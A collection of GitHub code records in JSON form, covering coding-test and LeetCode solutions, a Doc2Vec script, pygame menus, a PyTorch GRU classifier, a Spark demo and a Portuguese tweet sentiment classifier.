+{"seq_id":"11486299096","text":"import sys\nsys.setrecursionlimit(10**6)\n\ndef solution(n, paths, gates, summits):\n visited = [False] * (n+1)\n for gate in gates:\n visited[gate] = True\n for summit in summits:\n visited[summit] = \"summit\"\n \n graph = [[] for _ in range(n+1)]\n for path in paths:\n node1, node2, cost = path\n graph[node1].append([node2, cost])\n graph[node2].append([node1, cost])\n\n for i in range(len(graph)):\n graph[i].sort(key=lambda x: x[1])\n\n def dfs(n, max_intensity):\n global result, direction\n if max_intensity < result[1] and visited[n] == \"summit\":\n result = [n, max_intensity]\n return\n elif max_intensity == result[1] and n < result[0] and visited[n] == \"summit\":\n result = [n, max_intensity]\n return\n\n for node, cost in graph[n]:\n if cost > result[1] or (n, node) in direction:\n continue\n\n if not visited[node]:\n direction.add((n, node))\n visited[node] = True\n dfs(node, max(max_intensity, cost))\n visited[node] = False\n\n if visited[node] == \"summit\":\n dfs(node, max(max_intensity, cost))\n \n global result, direction\n result = [float('inf'), float('inf')] # 산봉우리의 번호, intensity의 최솟값\n direction = set()\n for gate in gates:\n dfs(gate, 0)\n\n return result\n\nprint(solution(7, [[1, 2, 5], [1, 4, 1], [2, 3, 1], [2, 6, 7], [4, 5, 1], [5, 6, 1], [6, 7, 1]], [3, 7], [1, 5]))\n\n\n\n # queue = deque()\n # queue.append((n, cummu_cost))\n # visited = [[False] * (n+1)]\n # visited[n] = True\n # while queue:\n # n, cummu_cost = queue.popleft()\n # for node, cost in graph[n]:\n # if node in gates:\n # continue\n\n \n # if not visited[node]:\n # visited[node] = True\n # queue.append((node, cummu_cost + cost))","repo_name":"ParkHoH/algorithm_test","sub_path":"programmers/coding test.py/카카오 인턴/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"42944116739","text":"class Solution:\n def canPartitionKSubsets(self, nums: List[int], k: int) -> bool:\n if not sum(nums)%k==0:\n return False\n\n def subsetSum(nums, summ, n):\n dp = [[False] * (summ + 1) for i in range(n + 1)]\n\n for i in range(n + 1):\n for j in range(summ + 1):\n if i == 0:\n dp[i][j] = False\n if j == 0:\n dp[i][j] = True\n\n for i in range(1, n + 1):\n for j in range(1, summ + 1):\n if nums[i - 1] <= j:\n dp[i][j] = dp[i - 1][j - nums[i - 1]] or dp[i - 1][j]\n\n elif nums[i - 1] > j:\n dp[i][j] = dp[i - 1][j]\n return dp[-1][-1]\n return subsetSum(nums,sum(nums)//k,len(nums))\n","repo_name":"iamshivamgoswami/dynamic-programming-important","sub_path":"subset sum.py","file_name":"subset sum.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7499541615","text":"from gensim.models.doc2vec import Doc2Vec\nfrom nltk.tokenize import word_tokenize\nimport numpy as np\n\nmodel= Doc2Vec.load(\"d2v.model\")\n#to find the vector of a document which is not in training data\n# test_data = word_tokenize(\"I love chatbots\".lower())\n# v1 = model.infer_vector(test_data)\n# print(\"V1_infer\", v1)\n\n# print(model.docvecs.most_similar(0))\n#\n# #to find most similar doc using tags\n# similar_doc = model.docvecs.most_similar('1')\n# print(similar_doc)\n\n\n# to find vector of doc in training data using tags or in other words, printing the vector of document at index 1 in training data\n#print(model.docvecs['0'])\n\nvectors=np.zeros((model.corpus_count,model.vector_size),np.float)\nprint(vectors.shape)\nfor i in range(model.corpus_count):\n vectors[i]=model.docvecs[i]\n\nprint(vectors.shape)\n\nprint(vectors[0])\n","repo_name":"siddhartha047/GSSLEmbedding","sub_path":"Vectorize/Doc2Vec/Test/Doc2VecTest.py","file_name":"Doc2VecTest.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"24027813401","text":"import pygame,sys\nfrom pygame.locals import *\nfrom constantes import *\nfrom gui_form import Form\nfrom gui_button import Button\nfrom gui_widget import Widget\n\nclass FormPause(Form):\n def __init__(self,name,master_surface,x,y,w,h,color_background,imagen_background,color_border,active):\n super().__init__(name,master_surface,x,y,w,h,color_background,imagen_background,color_border,active)\n self.text1 = Widget(master_form=self,x=35,y=25,w=240,h=70,color_background=None,color_border=None,image_background= None,text=\"PAUSED\",font=\"8 BIT WONDER NOMINAL\",font_size=38,font_color=C_WHITE)\n self.boton1 = Button(master=self,x=50,y=115,w=210,h=23,color_background=None,color_border=None,image_background= None,on_click=self.on_click_boton1,on_click_param=\"level_1\",text=\"RESUME\",font=\"8 BIT WONDER NOMINAL\",font_size=23,font_color=C_WHITE)\n self.boton2 = Button(master=self,x=50,y=150,w=210,h=23,color_background=None,color_border=None,image_background= None,on_click=self.on_click_boton1,on_click_param=\"pause_settings\",text=\"SETTINGS\",font=\"8 BIT WONDER NOMINAL\",font_size=23,font_color=C_WHITE)\n self.boton3 = Button(master=self,x=50,y=185,w=210,h=23,color_background=None,color_border=None,image_background= None,on_click=self.on_click_boton1,on_click_param=\"main_menu\",text=\"MAIN MENU\",font=\"8 BIT WONDER NOMINAL\",font_size=23,font_color=C_WHITE)\n self.boton4 = Button(master=self,x=50,y=220,w=210,h=23,color_background=None,color_border=None,image_background= None,on_click=self.exit_game,on_click_param=\"None\",text=\"EXIT GAME\",font=\"8 BIT WONDER NOMINAL\",font_size=23,font_color=C_WHITE)\n \n self.lista_widget = [self.boton1,self.boton2,self.boton3,self.boton4,self.text1]\n\n def on_click_boton1(self, parametro):\n \n self.set_active(parametro)\n \n def on_click_reset(self,parametro):\n self.forms_dict[self.boton1.on_click_param].resetear()\n self.set_active(parametro)\n \n\n def cambiar_nivel(self,parametro):\n self.boton1.on_click_param = parametro\n\n def exit_game(self,none):\n sys.exit()\n\n def update(self, lista_eventos,keys,sonidos,delta_ms,timer_1s):\n for aux_widget in self.lista_widget:\n aux_widget.update(lista_eventos,keys,delta_ms)\n for evento in lista_eventos:\n if evento.type == pygame.KEYDOWN:\n if evento.key == pygame.K_ESCAPE:\n self.set_active(self.boton1.on_click_param)\n\n def draw(self): \n super().draw()\n for aux_widget in self.lista_widget: \n aux_widget.draw()","repo_name":"MarceloTorres19/Marcelo_Torres_juego_pygame","sub_path":"gui_form_pause.py","file_name":"gui_form_pause.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35602695226","text":"from typing import List\n\n\nclass Solution:\n def threeSum(self, nums: List[int]) -> List[List[int]]:\n ret = []\n nums.sort()\n for left in range(len(nums) - 1):\n mid = left + 1\n right = len(nums) - 1\n if left > 0 and nums[left] == nums[left - 1]:\n continue\n while mid < right:\n total = nums[left] + nums[mid] + nums[right]\n if total == 0:\n ret.append([nums[left], nums[mid], nums[right]])\n while mid < right and nums[mid] == nums[mid + 1]:\n mid += 1\n while mid < right and nums[right] == nums[right - 1]:\n right -= 1\n\n mid += 1\n right -= 1\n elif total > 0:\n right -= 1\n else:\n mid += 1\n\n return ret\n","repo_name":"pktangyue/LeetCode","sub_path":"python/15_3Sum.py","file_name":"15_3Sum.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29777712611","text":"import numpy as np\n\n\ndef test_frame_exists(hardware_VidCapture):\n frame = hardware_VidCapture\n h, w = frame.shape[:2]\n\n assert w > 0\n assert w > h\n\n\ndef test_frame_size(hardware_VidCapture):\n \"\"\"Check it is of the expected dimensions.\n This is due to the amount of hardcoded values currently used in the package\"\"\"\n frame = hardware_VidCapture\n h, w = frame.shape[:2]\n assert h == 480\n assert w == 640\n\n\ndef test_numpy_mask(hardware_VidCapture):\n \"\"\"Check that a numpy mask works as expected\"\"\"\n frame = hardware_VidCapture\n h, w = frame.shape[:2]\n\n mask = np.zeros_like(frame)\n expectedH, expectedW = mask.shape[:2]\n\n assert expectedH == h\n assert expectedW == w\n\n\ndef test_streamlink_exists(streamlink_VidCapture):\n frame = streamlink_VidCapture\n h, w = frame.shape[:2]\n\n assert w > 0\n assert w > h\n","repo_name":"boo13/xcv","sub_path":"tests/test_video_frame.py","file_name":"test_video_frame.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"19383133034","text":"\"\"\"\n* Transformation explained.\n*\n* @author rambabu.posa\n\"\"\"\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import (lit,col,concat,expr)\nimport os\n\ncurrent_dir = os.path.dirname(__file__)\nrelative_path = \"../../../../data/NCHS_-_Teen_Birth_Rates_for_Age_Group_15-19_in_the_United_States_by_County.csv\"\nabsolute_file_path = os.path.join(current_dir, relative_path)\n\n# Step 1 - Creates a session on a local master\nspark = SparkSession.builder.appName(\"Analysing Catalyst's behavior\") \\\n .master(\"local[*]\").getOrCreate()\n\n# Step 2 - Reads a CSV file with header, stores it in a dataframe\ndf = spark.read.csv(header=True, inferSchema=True,path=absolute_file_path)\n\ndf0 = df\n\n# Step 3 - Build a bigger dataset\ndf = df.union(df0)\n\n# Step 4 - Cleanup. preparation\ndf = df.withColumnRenamed(\"Lower Confidence Limit\", \"lcl\") \\\n .withColumnRenamed(\"Upper Confidence Limit\", \"ucl\")\n\n# Step 5 - Transformation\ndf = df.withColumn(\"avg\", expr(\"(lcl+ucl)/2\")) \\\n .withColumn(\"lcl2\", col(\"lcl\")) \\\n .withColumn(\"ucl2\", col(\"ucl\"))\n\n# Step 6 - explain\ndf.explain()\n\nspark.stop()\n\n","repo_name":"jgperrin/net.jgp.books.spark.ch04","sub_path":"src/main/python/lab500_transformation_explain/transformationExplainApp.py","file_name":"transformationExplainApp.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"69"}
+{"seq_id":"10756260055","text":"# https://leetcode.com/problems/longest-palindromic-substring/?envType=list&envId=xi4ci4ig\n\nfrom utils import test\n\n\nclass Solution:\n def longestPalindrome(self, s: str) -> str:\n '''\n 使用 for 遍历字串每个字\n 对每个字,往左往右检查是否为回文字,取出回文字\n 比较出最大回文字\n '''\n # 于字串间填补 '#', 解决奇、偶回文字问题\n s = '#'.join(c for c in s)\n\n # 如果只有单一字串,回传单字\n longest_str = s[0]\n\n # 遍历字串每个字\n for i in range(len(s)):\n # 找出回文字半径 (左右扩展, 回传半径)\n r = self.get_palindrome_radius(s, i)\n if r > 0:\n # 取出半径内的字串,并移除填补的 '#'\n p_str = s[i-r:i+r+1].replace('#', '')\n # 比较是否为最大回文字\n if len(p_str) > len(longest_str):\n longest_str = p_str\n\n return longest_str\n\n def get_palindrome_radius(self, s, i):\n r_idx = i + 1\n l_idx = i - 1\n\n # 左右指标超出范围,回传 0\n if l_idx < 0 or r_idx > len(s) - 1:\n return 0\n\n # 左右扩展直到边界,当左右字不一样,回传回文字半径 (k 用来纪录半径)\n k = 0\n while l_idx >= 0 and r_idx < len(s):\n if s[l_idx] != s[r_idx]:\n return k\n\n k += 1\n l_idx -= 1\n r_idx += 1\n\n # 当左右扩展到边界后,回传回文字半径\n return k\n\n\nif __name__ == '__main__':\n inps = [\n \"ac\",\n \"a\",\n \"babad\",\n \"cbbd\"\n ]\n exps = [\n 'a',\n 'a',\n 'bab',\n 'bb'\n ]\n\n s = Solution()\n\n outs = []\n for inp in inps:\n outs.append(s.longestPalindrome(inp))\n\n test(outs, exps)\n\n print('out:', outs)\n print('exp:', exps)","repo_name":"conflick0/DSA","sub_path":"leetcode/5_Longest_Palindromic_Substring.py","file_name":"5_Longest_Palindromic_Substring.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19522450882","text":"import pandas as pd\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\n\nfrom src.data.wold import WOLD\n\n\nclass NN:\n\n def __init__(\n self,\n train_set,\n test_set,\n n_hidden: int = 32,\n ):\n self.df = WOLD().df\n self.train_set = train_set.reset_index(drop=True)\n self.test_set = test_set.reset_index(drop=True)\n\n self.all_letters = []\n\n for l in self.df.segments:\n for s in l:\n if s not in self.all_letters:\n self.all_letters.append(s)\n\n self.best_model = GRU(\n len(self.all_letters),\n n_hidden,\n 2, # this is a binary classification language task\n )\n\n self.best_model.load_state_dict(\n torch.load('src/models/gru/best_model_state.pt')\n )\n\n def predict(self, X):\n X = X.reset_index(drop=True)\n pred = []\n\n for i in range(len(X)):\n _, _, _, line_tensor = self.testing_sample(X, i)\n output = self.evaluate(line_tensor)\n guess = self.category_from_output(output)\n pred.append(guess)\n return pred\n\n def predict_word(self, word):\n line_tensor = self.char_tensor(word)\n output = self.evaluate(line_tensor)\n return self.category_from_output(output)\n\n def evaluate(self, line_tensor):\n hidden = self.best_model.initHidden()\n\n for i in range(line_tensor.size()[0]):\n output, hidden = self.best_model(line_tensor[i], hidden)\n\n return output\n\n def category_from_output(self, output):\n top_n, top_i = output.topk(1)\n category_i = top_i[0].item()\n return category_i\n\n def char_tensor(self, list_of_strings):\n tensor = torch.zeros(len(list_of_strings)).long()\n for c in range(len(list_of_strings)):\n tensor[c] = self.all_letters.index(list_of_strings[c])\n return Variable(tensor)\n\n def testing_sample(self, data, i):\n self.all_categories = [0, 1]\n category = int(data.borrowing_score[i])\n line = data.segments[i]\n category_tensor = torch.tensor([self.all_categories.index(category)], dtype=torch.long)\n line_tensor = self.char_tensor(line)\n\n return category, line, category_tensor, line_tensor\n\nclass GRU(nn.Module):\n def __init__(self, n_characters_in, hidden_size, n_characters_out, n_layers=1, batch_size=1):\n super(GRU, self).__init__()\n self.n_characters_in = n_characters_in\n self.n_characters_out = n_characters_out\n self.hidden_size = hidden_size\n self.n_layers = n_layers\n self.batch_size = batch_size\n\n self.encoder = nn.Embedding(num_embeddings=self.n_characters_in,\n embedding_dim=self.hidden_size)\n self.gru = nn.GRU(input_size=self.hidden_size,\n hidden_size=self.hidden_size,\n num_layers=self.n_layers,\n dropout=0.2)\n self.decoder = nn.Linear(self.hidden_size, n_characters_out)\n\n def forward(self, input_char, hidden):\n encoded = self.encoder(input_char)\n encoded.unsqueeze_(0)\n encoded.unsqueeze_(0)\n output, hidden = self.gru(encoded, hidden)\n output = self.decoder(output.view(1, -1))\n return output, hidden\n\n def initHidden(self):\n return Variable(torch.zeros(self.n_layers, self.batch_size, self.hidden_size))\n","repo_name":"hafer-cappuccino/bahasa-loanword-detection","sub_path":"src/models/gru/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"41151922996","text":"from __future__ import annotations\nfrom typing import Any\n\nclass ForumPostModel:\n \"\"\"\n A model that contains info about a forum post.\n\n ...\n\n Attributes\n ----------\n thread_id : int\n unique id for the thread\n page_num : int\n page number in the thread of the post\n post_num : int\n post number on the page\n username : str\n the username of the poster\n post_body : str\n the body message of the post\n timestamp : str\n the cleaned timestamp\n edit_timestamp : str\n cleaned edit timestamp, can be None\n scraped_timestamp : str\n the raw timestamp as it was posted\n \"\"\"\n\n def __init__(\n self,\n thread_id: int,\n page_num: int,\n post_num: int,\n username: str,\n post_body: str,\n timestamp: str,\n edit_timestamp: str,\n scraped_timestamp: str\n ):\n self.thread_id = thread_id\n self.page_num = page_num\n self.post_num = post_num\n self.username = username\n self.post_body = post_body\n self.timestamp = timestamp\n self.edit_timestamp = edit_timestamp\n self.scraped_timestamp = scraped_timestamp\n \n @classmethod\n def from_array(cls, data: Any) -> ForumPostModel:\n obj = cls(data[0], data[1], data[2], data[3], data[4], data[5], data[6], data[7])\n return obj\n \n #NOTE: this works, but i dont know if it is good practice\n # def __init__(self, *args, **kwargs):\n # if len(args) == 8:\n # self.from_array(list(args))\n # elif len(args) == 1:\n # self.from_array(args[0])\n\n def identifier(self):\n \"\"\"\n returns the identifying numbers for the post\n \"\"\"\n return (self.thread_id, self.page_num, self.post_num)\n\n def __str__(self):\n line = \"\\n------------------------------------------------------------------\\n\"\n meta = \"Post #{}.{}.{} - {}\\n\".format(self.thread_id, self.page_num, self.post_num, self.scraped_timestamp)\n post = \"{}\\n\\t{}\\nPosted: {}, Edited: {}\".format(self.username, self.post_body, self.timestamp, self.edit_timestamp)\n return line + meta + post + line \n","repo_name":"binzabinza/rs-disc","sub_path":"Models/forum_post_model.py","file_name":"forum_post_model.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"451978213","text":"# This project can be found at\n# https://www.kaggle.com/leandrodoze/sentiment-analysis-in-portuguese/notebook\n\n# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n\n# Análise de sentimento de Tweets de Minas Gerais\n\n# --- Importando as bibliotecas --- #\nimport pandas as pd\nfrom sklearn import metrics\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.feature_extraction.text import CountVectorizer\n\n# --- Carregamento de dados --- #\nurl='https://drive.google.com/file/d/1Ds6zhEE7HJgLPP22ZVDVmkWjODr_jxFc/view?usp=sharing'\nfile_id=url.split('/')[-2]\ndwn_url='https://drive.google.com/uc?id=' + file_id\n\n# Download dos dados do kaggle\ndataset = pd.read_csv(dwn_url)\n\n# --- Verificando os dados --- #\n\"\"\"\n# Mostrar linhas inicias da tabela\nprint(dataset.head())\nprint()\n# Quantidade de dados\nprint(dataset.count())\nprint()\n# Os classificados como neutro\nprint(dataset[dataset.Classificacao == 'Neutro'].count())\nprint()\n# Os classificados como positivo\nprint(dataset[dataset.Classificacao == 'Positivo'].count())\nprint()\n# E os classificados como negativo\nprint(dataset[dataset.Classificacao == 'Negativo'].count())\nprint()\n\"\"\"\n# --- Separando os dados --- #\n\n# Próximo passo, vamos separar os tweets e suas classes\ntweets = dataset[\"Text\"].values\nprint(tweets)\nprint()\nclasses = dataset[\"Classificacao\"].values\nprint(classes)\nprint()\n\n# Vamos usar algumas frases de teste para fazer a classificação com o modelo treinado\ntestes = [\"Esse governo está no início, vamos ver o que vai dar\",\n \"Estou muito feliz com o governo de São Paulo esse ano\",\n \"O estado de Minas Gerais decretou calamidade financeira!!!\",\n \"A segurança desse país está deixando a desejar\",\n \"O governador de Minas é do PT\",\n \"O prefeito de São Paulo está fazendo um ótimo trabalho\"]\n\n# --- Preparação do modelo --- #\n\n# Random Forest\nfrom sklearn.ensemble import RandomForestClassifier\nforest = RandomForestClassifier(n_estimators=100)\n\n# --- Treinamento do modelo --- #\n\n# Inicializar o bag of words com um parâmetro máximo de features\nvectorizer = CountVectorizer(analyzer = \"word\", tokenizer = None, preprocessor = None,\n stop_words = None, max_features = 5000)\n# Treinar o modelo, aprender o vocabulário e transformar nossos dados de treinamento em feature vectors\ntrain_data_features = vectorizer.fit_transform(tweets)\n# Ajusta a forest ao dataset de treinamento usando a bag of words como feature e os sentimentos\n# como a resposta variável\nforest = forest.fit(train_data_features, classes)\n\n# --- Avaliação do modelo --- #\n\nresultados = cross_val_predict(forest, train_data_features, classes, cv = 10)\n# Medidas de validação do modelo\nsentimentos = ['Neutro', 'Positivo', 'Negativo']\nprint(metrics.classification_report(classes, resultados, target_names = sentimentos))\n\n# --- Classificação de tweets --- #\n\n# Criar a BOW de teste\ntest_data_features = vectorizer.transform(testes)\n# Fazendo a predição\nresultados = forest.predict(test_data_features)\n# Disposição de dados em tabela\ntestes_id = [1, 2, 3, 4, 5, 6]\n\ndata_frame = pd.DataFrame(data = { \"id\": testes_id, \"texto\": testes, \"sentimento\": resultados })\nprint(data_frame)\n\n# Está bem ruim, vamos melhorar o modelo\n","repo_name":"iagoscm/katie-ciencia-de-dados","sub_path":"analiseSentimentosTwitter.py","file_name":"analiseSentimentosTwitter.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"37080315061","text":"from data_processing import SeriesDataset\nimport torch\nimport pandas as pd\nfrom torch.utils.data import DataLoader\nfrom model import LSTMModel\n\nfactory_kwargs = {'device': 1, 'dtype': 2}\nprint({**factory_kwargs})\n\na= [1,2,3]\ndel a[0]\nprint(len(a))\n\ninput_path = \"data/building-data-genome-project-2/data/processing/weather/Hog.csv\"\ntarget_path = \"data/building-data-genome-project-2/data/processing/electricity/Hog.csv\"\ntarget_index = ['Hog_education_Jordan']\ninput_index = ['timestamp', 'airTemperature', 'dewTemperature', 'windSpeed']\ntime_set = SeriesDataset(input_path, target_path, timeenc=0, input_index=input_index, target_index=target_index)\ntime_loader = DataLoader(time_set, batch_size=1, shuffle=False)\nmodel = LSTMModel(input_size=3, hidden_size=64, num_layers=2, output_size=1)","repo_name":"Mborn2run/CustomModel","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"41179952982","text":"import sys\nfrom eval import evaluator\n\ndef create_pop(ind,v):\n pop = []\n for i in range(evaluator.D):\n if ind[i] == v:\n continue\n tmp = [x for x in ind]\n tmp[i] = v\n pop.append(tmp)\n return pop\n\n# 目的関数値のみを考慮した解選択\ndef get_indexA(f1_list,m_list,best,pay):\n index = -1\n for i, f1 in enumerate(f1_list):\n if best > f1:\n index = i\n best = f1\n return index\n\n# 目的関数値と支給金額を考慮した解選択\ndef get_indexB(f1_list,m_list,best,pay):\n index, value = -1, 0 \n for i, (f1, m) in enumerate(zip(f1_list, m_list)):\n if pay == m:\n v = (best - f1) / 0.001\n else:\n v = (best - f1) / abs(pay - m)\n if value < v:\n index = i\n value = v\n return index\n\ndef main():\n args = sys.argv\n evaluator.init(args[1], args[2])\n if args[3] == \"A\":\n get_index = get_indexA\n else:\n get_index = get_indexB\n b = int(args[4])\n\n change_count, fe = 0, 2\n ind = [b] * evaluator.D\n b = abs(b-1)\n f1_list, _, m_list = evaluator.evaluation([ind])\n best = f1_list[0]\n pay = m_list[0]\n print(-1, best, pay, *ind, sep=\",\")\n print(fe, best, pay, -1, -1, sep=\",\", file=sys.stderr)\n\n for num in range(40):\n if change_count == 2:\n break\n pop = create_pop(ind,b)\n f1_list, _, m_list = evaluator.evaluation(pop)\n for p, f1, m in zip(pop, f1_list, m_list):\n print(num, f1, m, *p, sep=\",\")\n fe += 2*len(pop)\n \n index = get_index(f1_list,m_list,best,pay)\n\n if index == -1:\n print(fe, best, -1, -1, -1, sep=\",\", file=sys.stderr)\n b = abs(b-1)\n change_count += 1\n continue\n \n for i in range(evaluator.D):\n if ind[i] != pop[index][i]:\n break\n print(fe, f1_list[index], m_list[index], i, index, sep=\",\", file=sys.stderr)\n change_count = 0\n ind = [x for x in pop[index]]\n best = f1_list[index]\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tomtkg/EC-Comp2021","sub_path":"propose.py","file_name":"propose.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"5606386915","text":"import numpy as np\nimport math\n\n\ndef mode0(br, codRes, fps):\n # model parameters\n a1 = 11.99835\n a2 = -2.99992\n a3 = 41.24751\n a4 = 0.13183\n\n # core model\n bpp = br / (codRes * fps)\n quant = a1 + a2 * np.log(a3 + np.log(br) + np.log(br * bpp + a4))\n return quant","repo_name":"songhaocuc/abr-evaluation","sub_path":"evaluator/pnats/p1203/mode0.py","file_name":"mode0.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"26253312536","text":"import glob\nimport os\nfrom io import BytesIO\nfrom typing import Iterable, List, Tuple\n\nimport numpy as np\nimport tensorflow as tf\nfrom PIL import Image\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.models import Sequential\n\nmodel = Sequential(\n [\n tf.keras.Input(shape=(40000,)),\n Dense(128, activation=\"sigmoid\"),\n Dense(64, activation=\"sigmoid\"),\n Dense(32, activation=\"sigmoid\"),\n Dense(10, activation=\"linear\"),\n ],\n name=\"numbers_classification_model1\",\n)\n\n\nmodel.compile(\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n optimizer=tf.keras.optimizers.Adam(learning_rate=0.001),\n)\n\n\ndef get_label_from_filename(filename: str) -> int:\n return int(os.path.split(filename)[-1][0])\n\n\ndef get_bw_value(pixel: Tuple[int]) -> int:\n if all([x == 255 for x in pixel]):\n return 1\n return 0\n\n\ndef transform_to_black_and_white_array(image_data: Iterable) -> List[int]:\n return [get_bw_value(pixel) for pixel in image_data]\n\n\ndef load_training_data() -> Tuple[list, list]:\n X_train = []\n y_train = []\n test_filename = \"\"\n for filename in sorted(glob.glob(os.path.join(\"src/training_data/\", \"*.png\"))):\n with Image.open(filename) as image:\n test_filename == filename\n image_data = image.getdata()\n X_train.append(transform_to_black_and_white_array(image_data))\n y_train.append(get_label_from_filename(filename))\n\n return X_train, y_train\n\n\ndef train_model(X_train: list, y_train: list) -> None:\n model.fit(X_train, y_train, epochs=300)\n model.summary()\n\n\ndef predict_label(x: list, internal_model: Sequential = model) -> np.signedinteger:\n prediction_array = internal_model.predict([x])\n prediction_array_with_softmax = tf.nn.softmax(prediction_array)\n return np.argmax(prediction_array_with_softmax)\n\n\ndef categorize_image(decoded_image: bytes) -> np.signedinteger:\n image = Image.open(BytesIO(decoded_image))\n bw_array = transform_to_black_and_white_array(image.getdata())\n\n prediction = predict_label(bw_array)\n\n return prediction\n","repo_name":"RadekLejba/numbers_classification","sub_path":"app/src/neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73154204071","text":"import pygame, time, sys\n\npygame.mixer.pre_init(frequency=22050, size=-16, channels=2, buffer=64)\npygame.init()\n\nscreen = pygame.display.set_mode((300, 300))\nclock = pygame.time.Clock()\n\nfps = 60\n\nbpm = 103\n\nkey = False\n\ncolor = (20, 70, 20)\n\nbeat_counter = 0\n\nbeats_pressed = 0\n\ntotal_beats = 1\n\nclap = pygame.mixer.Sound(\"Ste Ingham Synthwave Clap 01.wav\")\nkick = pygame.mixer.Sound(\"Ste Ingham Synthwave Kick 04.wav\")\nshaker = pygame.mixer.Sound(\"shaker-analog.wav\")\n\nshaker.set_volume(0.5)\n\ndrum_beat = [clap, None, shaker, None, kick, None, shaker, None]\n\nBEAT_EVENT = pygame.USEREVENT + 1\n\nactive = False\n\nwhile 1:\n\n # check events\n key = False\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.display.quit()\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_z:\n key = True\n if event.type == BEAT_EVENT:\n if beat_counter == 7:\n beat_counter = 0\n total_beats += 1\n else:\n beat_counter += 1\n \n if drum_beat[beat_counter] != None:\n drum_beat[beat_counter].play()\n\n if beat_counter == 0:\n color = (20, 70, 20)\n elif beat_counter == 4:\n color = (70, 20, 40)\n \n # check input is on beat\n if beat_counter in [0, 1, 7]:\n if key:\n beats_pressed += 1\n color = (200, 170, 90)\n if not(active):\n pygame.time.set_timer(BEAT_EVENT, int((60/bpm)*1000/4))\n active = True\n \n \n\n # render\n screen.fill(color)\n pygame.display.update()\n clock.tick(fps)\n \n","repo_name":"xLainik/TJAJ-jam2021","sub_path":"scr/utility/prueba.py","file_name":"prueba.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"74551956710","text":"from operator import imod\nfrom uuid import uuid4\nfrom user import User\nfrom login_system import LoginSystemInterface\nfrom salary_request_manager import SalaryRequestManager \n\nclass Employee(User):\n def __init__(self, fullName, dob, gender, address, salary, funds, authorizer = LoginSystemInterface):\n super().__init__(fullName, dob, gender, address, authorizer)\n self.empId = str(uuid4())\n self.salary = salary\n self.funds = funds\n\n def requestSalary(self):\n \"\"\"Add a salary request and update funds\"\"\"\n if not self.authorizer.isLoggedIn():\n print('You are not logged in!')\n return\n\n isProcessed, creditAmount = SalaryRequestManager.addSalaryRequest(self.authorizer.getUserName(), self.salary)\n if not isProcessed:\n print('Salary request was not processed! Try again later.')\n return\n\n self.funds += creditAmount\n print('Salary request processed successfully.')\n ","repo_name":"srividya-p/Forcepoint-Training","sub_path":"15-7-22/hospital-app/employee.py","file_name":"employee.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
